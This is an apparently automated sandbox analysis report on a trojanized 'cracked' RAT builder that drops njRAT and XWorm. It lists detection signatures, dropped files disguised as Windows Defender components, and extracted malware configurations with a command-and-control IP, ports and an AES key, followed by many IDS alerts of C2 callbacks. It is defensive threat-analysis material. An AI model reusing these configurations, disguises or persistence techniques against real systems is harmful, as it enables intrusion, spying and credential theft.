Windows Analysis Report
CraxsRAT v7.6 Cracked.exe

Overview

General Information

Sample name: CraxsRAT v7.6 Cracked.exe
Analysis ID: 1549855
MD5: 8310bdf3ac82001830f75c15fba8cc15
SHA1: 581d729268cbd245d091633cc19692c4b5bfa0af
SHA256: f7f52f6bbffa02fffcea30d5806050b7702a9a78dcbeae83e28c45d81aa1c4c4
Tags: exeuser-___

Detection

Njrat, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Njrat
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Contains functionality to spread to USB devices (.Net source)
Creates autostart registry keys with suspicious names
Creates files with lurking names (e.g. Crack.exe)
Creates multiple autostart registry keys
Disables zone checking for all users
Drops PE files to the startup folder
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: NjRAT
Description: RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives." It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
Attribution:
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

Name: XWorm
Description: Malware with wide range of capabilities ranging from RAT to ransomware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection

Source: CraxsRAT v7.6 Cracked.exe Avira: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Avira: detection malicious, Label: ANDROID/SpyNote.mcdzu
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Avira: detection malicious, Label: TR/Spy.Gen
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["45.145.41.178"], "Port": 1111, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "Porno.exe", "Version": "XWorm V5.6"}
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack Malware Configuration Extractor: Njrat {"Host:Port": ["45.145.41.178:2222"], "Campaign ID": "HacKed", "Install File": "Windows Defender Real Time Protection.exe", "Install Folder": "TEMP", "Version": "0.12G", "Network Seprator": "|'|'|"}
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Virustotal: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Virustotal: Detection: 67%
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Virustotal: Detection: 76%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe ReversingLabs: Detection: 95%
Source: CraxsRAT v7.6 Cracked.exe ReversingLabs: Detection: 63%
Source: CraxsRAT v7.6 Cracked.exe Virustotal: Detection: 54%
Source: Yara match File source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Joe Sandbox ML: detected
Source: CraxsRAT v7.6 Cracked.exe Joe Sandbox ML: detected
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack String decryptor: 45.145.41.178
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack String decryptor: 1111
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack String decryptor: <123456789>
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack String decryptor: <Xwormmm>
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack String decryptor: XWorm V5.6
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack String decryptor: Porno.exe
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack String decryptor: %AppData%
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack String decryptor: Windows Defender Notification.exe
Source: CraxsRAT v7.6 Cracked.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: CraxsRAT v7.6 Cracked.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Spreading

Source: Windows Defender Real Time Protection.exe.0.dr, OK.cs .Net Code: USBspr
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, OK.cs .Net Code: USBspr
Source: 0e75fed00639ea9e725255499292dcdd.exe.2.dr, OK.cs .Net Code: USBspr
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: autorun.inf![autorun]
Source: Windows Defender Real Time Protection.exe, 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: autorun.inf![autorun]
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: autorun.inf
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [autorun]
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Users\user\Desktop\desktop.ini

Networking

Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53740 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53756 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53756 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53740 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53783 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53799 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53707 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:63387 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53783 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:63387 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53799 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53707 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53723 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53723 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53772 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53772 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53827 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53827 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53841 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53841 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53814 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53814 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53876 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53876 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53859 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53859 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53891 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53891 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53904 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53904 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53922 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53922 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53940 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53968 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53968 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53968 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53940 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53957 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53977 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53977 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53985 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53957 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53985 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53989 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53987 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53987 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53990 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53983 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53989 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53988 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53983 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53989 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53986 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53990 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53987 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53988 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53990 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53988 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53991 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53984 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53986 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53992 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53991 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53992 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53993 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53993 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53993 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53984 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53996 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53995 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53997 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53996 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53997 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53995 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53997 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53994 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53994 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53999 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53999 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53994 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54000 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54000 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54002 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54002 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54003 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54002 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54003 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54004 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54004 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54006 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54006 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54006 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53995 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54008 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53992 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54000 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53993 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54008 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54008 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54009 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54009 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53991 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54011 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54011 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54012 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54011 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54012 -> 45.145.41.178:2222
